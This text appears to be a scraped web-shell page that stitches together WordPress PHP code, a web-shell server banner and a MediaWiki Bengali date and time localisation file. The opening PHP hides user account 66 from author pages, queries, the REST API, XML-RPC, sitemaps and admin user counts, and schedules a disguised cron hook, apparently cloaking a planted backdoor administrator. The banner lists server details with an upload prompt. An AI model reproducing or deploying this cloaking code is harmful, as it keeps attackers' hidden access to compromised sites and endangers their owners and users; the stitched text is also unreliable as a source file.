add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/languages/i18n/datetime/ |
Upload File : |
{
"@metadata": {
"authors": [
"Bellayet",
"Nasir8891",
"לערי ריינהארט",
"আফতাবুজ্জামান"
]
},
"january": "জানুয়ারি",
"february": "ফেব্রুয়ারি",
"march": "মার্চ",
"april": "এপ্রিল",
"may_long": "মে",
"june": "জুন",
"july": "জুলাই",
"august": "আগস্ট",
"september": "সেপ্টেম্বর",
"october": "অক্টোবর",
"november": "নভেম্বর",
"december": "ডিসেম্বর",
"january-gen": "জানুয়ারি",
"february-gen": "ফেব্রুয়ারি",
"march-gen": "মার্চ",
"april-gen": "এপ্রিল",
"may-gen": "মে",
"june-gen": "জুন",
"july-gen": "জুলাই",
"august-gen": "আগস্ট",
"september-gen": "সেপ্টেম্বর",
"october-gen": "অক্টোবর",
"november-gen": "নভেম্বর",
"december-gen": "ডিসেম্বর",
"jan": "জানু",
"feb": "ফেব্রু",
"mar": "মার্চ",
"apr": "এপ্রিল",
"may": "মে",
"jun": "জুন",
"jul": "জুলাই",
"aug": "আগস্ট",
"sep": "সেপ্টে",
"oct": "অক্টো",
"nov": "নভে",
"dec": "ডিসে",
"monday": "সোমবার",
"tuesday": "মঙ্গলবার",
"wednesday": "বুধবার",
"thursday": "বৃহস্পতিবার",
"friday": "শুক্রবার",
"saturday": "শনিবার",
"sunday": "রবিবার",
"mon": "সোম",
"tue": "মঙ্গল",
"wed": "বুধ",
"thu": "বৃহস্পতি",
"fri": "শুক্র",
"sat": "শনি",
"sun": "রবি",
"period-am": "পূর্বাহ্ণ",
"period-pm": "অপরাহ্ণ",
"timezone-utc": "ইউটিসি",
"timezone-local": "স্থানীয়",
"hebrew-calendar-m1": "তিশরেই",
"hebrew-calendar-m2": "হেশভান",
"hebrew-calendar-m3": "কিসলেভ",
"hebrew-calendar-m4": "তেভেত",
"hebrew-calendar-m5": "শেভাত",
"hebrew-calendar-m6": "আদার",
"hebrew-calendar-m6a": "আদার ১",
"hebrew-calendar-m6b": "আদার ২",
"hebrew-calendar-m7": "নিসান",
"hebrew-calendar-m8": "ইয়ার",
"hebrew-calendar-m9": "সিভান",
"hebrew-calendar-m10": "তামুয",
"hebrew-calendar-m11": "আভ",
"hebrew-calendar-m12": "এলুল",
"hebrew-calendar-m1-gen": "তিশরি",
"hebrew-calendar-m2-gen": "হেশভান",
"hebrew-calendar-m3-gen": "কিসলেভ",
"hebrew-calendar-m4-gen": "তেভেত",
"hebrew-calendar-m5-gen": "শেভাত",
"hebrew-calendar-m6-gen": "আদার",
"hebrew-calendar-m6a-gen": "আদার ১",
"hebrew-calendar-m6b-gen": "আদার ২",
"hebrew-calendar-m7-gen": "নিসান",
"hebrew-calendar-m8-gen": "ইয়ার",
"hebrew-calendar-m9-gen": "সিভান",
"hebrew-calendar-m10-gen": "তামুয",
"hebrew-calendar-m11-gen": "আভ",
"hebrew-calendar-m12-gen": "এলুল",
"hijri-calendar-m1": "মুহররম",
"hijri-calendar-m2": "সফর",
"hijri-calendar-m3": "রবিউল আউয়াল",
"hijri-calendar-m4": "রবিউস সানি",
"hijri-calendar-m5": "জমাদিউল আউয়াল",
"hijri-calendar-m6": "জমাদিউস সানি",
"hijri-calendar-m7": "রজব",
"hijri-calendar-m8": "শা'বান",
"hijri-calendar-m9": "রমজান",
"hijri-calendar-m10": "শাওয়াল",
"hijri-calendar-m11": "জ্বিলকদ",
"hijri-calendar-m12": "জ্বিলহজ্জ",
"iranian-calendar-m1": "ফারওয়ারদিন",
"iranian-calendar-m2": "অর্দিবেহেশ্ত",
"iranian-calendar-m3": "খোরদাদ",
"iranian-calendar-m4": "তির",
"iranian-calendar-m5": "মোরদাদ",
"iranian-calendar-m6": "শাহ্রিওয়ার",
"iranian-calendar-m7": "মেহ্র",
"iranian-calendar-m8": "আবান",
"iranian-calendar-m9": "আজার",
"iranian-calendar-m10": "দেই",
"iranian-calendar-m11": "বাহ্মান",
"iranian-calendar-m12": "এসফান্দ",
"years": "{{PLURAL:$1|$1 বছর}}",
"months": "{{PLURAL:$1|$1 মাস}}",
"weeks": "{{PLURAL:$1|$1 সপ্তাহ}}",
"days": "{{PLURAL:$1|$1 দিন}}",
"hours": "{{PLURAL:$1|$1 ঘণ্টা}}",
"minutes": "{{PLURAL:$1|$1 মিনিট}}",
"seconds": "{{PLURAL:$1|$1 সেকেন্ড|$1 সেকেন্ড}}",
"days-abbrev": "$1 দিন",
"hours-abbrev": "$1 ঘ",
"minutes-abbrev": "$1 মি",
"seconds-abbrev": "$1 সে",
"ago": "$1 আগে",
"duration-millennia": "$1 {{PLURAL:$1|সহস্রাব্দ}}",
"duration-centuries": "$1 {{PLURAL:$1|শতাব্দী}}",
"duration-decades": "$1 {{PLURAL:$1|দশক}}",
"duration-years": "$1 {{PLURAL:$1|বছর}}",
"duration-months": "$1 {{PLURAL:$1|মাস}}",
"duration-weeks": "$1 {{PLURAL:$1|সপ্তাহ}}",
"duration-days": "$1 {{PLURAL:$1|দিন}}",
"duration-hours": "$1 {{PLURAL:$1|ঘণ্টা}}",
"duration-minutes": "$1 {{PLURAL:$1|মিনিট}}",
"duration-seconds": "$1 {{PLURAL:$1|সেকেন্ড}}",
"monday-at": "সোমবার, $1",
"tuesday-at": "মঙ্গলবার, $1",
"wednesday-at": "বুধবার, $1",
"thursday-at": "বৃহস্পতিবার, $1",
"friday-at": "শুক্রবার, $1",
"saturday-at": "শনিবার, $1",
"sunday-at": "রবিবার, $1",
"yesterday-at": "গতকাল, $1",
"hours-ago": "$1 {{PLURAL:$1|ঘণ্টা}} পূর্বে",
"minutes-ago": "$1 {{PLURAL:$1|মিনিট}} পূর্বে",
"seconds-ago": "$1 {{PLURAL:$1|সেকেন্ড}} পূর্বে",
"just-now": "এইমাত্র"
}